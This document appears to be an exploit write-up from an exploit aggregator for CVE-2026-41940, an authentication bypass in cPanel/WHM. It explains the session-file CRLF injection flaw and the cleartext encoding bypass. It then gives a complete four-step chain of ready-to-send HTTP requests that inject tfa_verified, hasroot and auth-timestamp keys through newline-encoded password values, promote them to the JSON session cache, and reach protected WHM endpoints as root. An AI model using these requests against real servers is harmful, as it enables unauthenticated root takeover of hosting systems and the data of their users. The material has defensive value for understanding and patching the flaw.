## https://sploitus.com/exploit?id=CF0C2489-6ED0-5567-88D6-1125DAE41E0B
# CVE-2026-41940: cPanel/WHM Authentication Bypass Analysis
## Vulnerability Overview
CVE-2026-41940 is a critical authentication bypass vulnerability in cPanel & WHM affecting all currently supported versions. It allows an unauthenticated attacker to bypass authentication and gain root-level access (WHM) or user-level access (cPanel).
## Technical Root Cause
The vulnerability stems from two primary issues in `Cpanel/Session.pm`:
1. **CRLF Injection in `saveSession`**: The `saveSession` function did not properly sanitize input before writing it to the session file on disk. Specifically, it failed to strip newline characters (`\n`) from the `pass` field.
2. **Conditional Encoding Bypass**: The `pass` field in the session file is normally encrypted using a per-session secret (`ob`). However, if the session cookie does not contain the `ob` part (the part after the comma), the encoding is skipped, and the `pass` value is written in cleartext.
## Exploitation Process
The exploitation is a multi-step process:
### 1. Create a Pre-auth Session
Send a failed login attempt to trigger the creation of a session file on disk.
```http
POST /login/?login_only=1 HTTP/1.1
Host: target:2087
Content-Type: application/x-www-form-urlencoded
user=root&pass=anything
```
The server responds with a `whostmgrsession` cookie, e.g., `whostmgrsession=:Wg_mjzgt1hyfXefK,1bd3d4...`.
### 2. Inject Malicious Session Keys
Send another request using the session cookie but **remove the `ob` part** (the comma and everything after it). In the `pass` field, inject the desired session keys using newlines.
```http
POST /login/?login_only=1 HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=:Wg_mjzgt1hyfXefK
Content-Type: application/x-www-form-urlencoded
user=root&pass=x%0atfa_verified=1%0ahasroot=1%0asuccessful_internal_auth_with_timestamp=1777462149
```
Because the `ob` part is missing, `cpsrvd` writes the `pass` value unencoded. The injected newlines cause the subsequent lines to be interpreted as separate key-value pairs in the raw session file.
### 3. Promote Injection to JSON Cache
cPanel uses a JSON cache for sessions. The raw injection is only in the text file. To make it "active," we must force cPanel to re-read the raw file and update the JSON cache. This can be done by triggering a "Token Denied" error on an endpoint that uses `Cpanel::Session::Modify`.
```http
GET /scripts2/listaccts HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=:Wg_mjzgt1hyfXefK
```
The missing security token in the URL triggers `do_token_denied`, which uses `Cpanel::Session::Modify` to update the `token_denied` count. `Modify` reads the raw file (bypassing cache) and then writes both the raw file and the JSON cache, effectively promoting our injected keys to the top level of the JSON cache.
### 4. Access Protected Endpoints
Now the session is fully "authenticated" in the eyes of cPanel. The `successful_internal_auth_with_timestamp` key bypasses the `/etc/shadow` check.
```http
GET /cpsess[TOKEN]/json-api/version HTTP/1.1
Host: target:2087
Cookie: whostmgrsession=:Wg_mjzgt1hyfXefK
```
The `[TOKEN]` can be obtained from the `cp_security_token` field in the session, which is often returned in the "Token Denied" response or can be found by inspecting the session cookie behavior.
## Key Injected Fields
- `tfa_verified=1`: Bypasses Two-Factor Authentication.
- `hasroot=1`: Grants root privileges in WHM.
- `successful_internal_auth_with_timestamp=[TIMESTAMP]`: Bypasses the actual password verification against the system shadow file.
- `user=root`: Sets the session user to root.